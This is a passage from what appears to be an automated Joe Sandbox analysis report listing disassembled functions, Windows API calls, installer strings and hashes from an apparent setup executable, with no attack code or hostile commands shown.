                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041BBC8 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                                                                                                                                                                                                                                                                                                  • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MetricsSystem$A570A6310DeleteObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3435189566-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00473848 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0045D3B0: SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738D5
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738EB
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to set permissions on registry key (%d)., xrefs: 004738FC
                                                                                                                                                                                                                                                                                                                                                                  • Could not set permissions on the registry key because it currently does not exist., xrefs: 004738DF
                                                                                                                                                                                                                                                                                                                                                                  • Setting permissions on registry key: %s\%s, xrefs: 0047389A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-4018462623
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4d98b71999ae2082828fc29cf634de87cfef39e11f459e5f22db8e3bfe246984
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e56c8fb080e82cb73bff42131c1910bc7e2d1be1188aa0d4929b19add272574
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d98b71999ae2082828fc29cf634de87cfef39e11f459e5f22db8e3bfe246984
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D42186B0A046485FCB00DFA9C8816EEBBE5DF49315F50817BE508E7392D7B85A05CB6A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                                                                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 262959230-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004143F0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: E922E98830$A480
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3692852386-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042E944 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E966
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E99E
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9A6
                                                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9AC
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1177325624-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c2b32b2b07f49d41d3dbdf125302b54fc4faf3ebe171660f17d813ef15d361c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 40e29ed62a0e901db822078ff48c294e58af048427126d47a83bbc7ee0829aa9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c2b32b2b07f49d41d3dbdf125302b54fc4faf3ebe171660f17d813ef15d361c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BF090B23A17207AF620B57A6C86F7F418CC785B68F10823BBB04FF1C1D9A85D05556D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401548 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,L2h,?,?,?,004018B4), ref: 00401566
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,L2h,?,?,?,004018B4), ref: 0040158B
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,L2h,?,?,?,004018B4), ref: 004015B1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                                                                                                                  • String ID: L2h$|2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3668210933-580210207
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ed10fda1d5a177d2a0c43996bc0be7fa2989f050302610c9045c0a13ae1d279a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFF0C8716403206AEB315A294C85F133AD4DBC5754F104075BE09FF3DAD6B8980082AC
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0046BE48 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Need to restart Windows? %s, xrefs: 0046C172
                                                                                                                                                                                                                                                                                                                                                                  • PrepareToInstall failed: %s, xrefs: 0046C14B
                                                                                                                                                                                                                                                                                                                                                                  • NextButtonClick, xrefs: 0046BF84
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2329492092
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ebbf1f9ef76be85ef82e878402c1311cdfd52bf366864cdbcb8254cf7c08a6b9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1202268df95ceb0eead913a0caf14b6b564ec17a2e6689a58d7256d675820d07
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebbf1f9ef76be85ef82e878402c1311cdfd52bf366864cdbcb8254cf7c08a6b9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64C16D34A04208DFCB00DB98C9D5AEE77B5EF05304F1444B7E840AB362D778AE41DBAA
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00482B0C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 224COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,00000000,00482E54), ref: 00482C30
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482CC5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ActiveChangeNotifyWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $Need to restart Windows? %s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1160245247-4200181552
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ca071c16d970d9f92bb59f1fa37784b4b8a51c549d6f2244aaf7164950ab745
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2191B4346042458FDB10EB69D9C5BAD77F4AF59308F0084BBE8009B3A2CBB8AD05CB5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0046FD84 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0046FF81,?,?,0049C1D0,00000000), ref: 0046FE5E
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FED8
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FEFD
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Creating directory: %s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2451617938-483064649
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 892f1ca02512540dfd12b783a17ec89958af887d03fc0ba297f933839a84b762
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bdf8a9d00633064e3922ce557b3b2562df44373322d6b4000fae74d311730630
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 892f1ca02512540dfd12b783a17ec89958af887d03fc0ba297f933839a84b762
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE513F74A00248ABDB04DFA5D582BDEB7F5AF09304F50817BE850B7382D7786E08CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00406FAC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
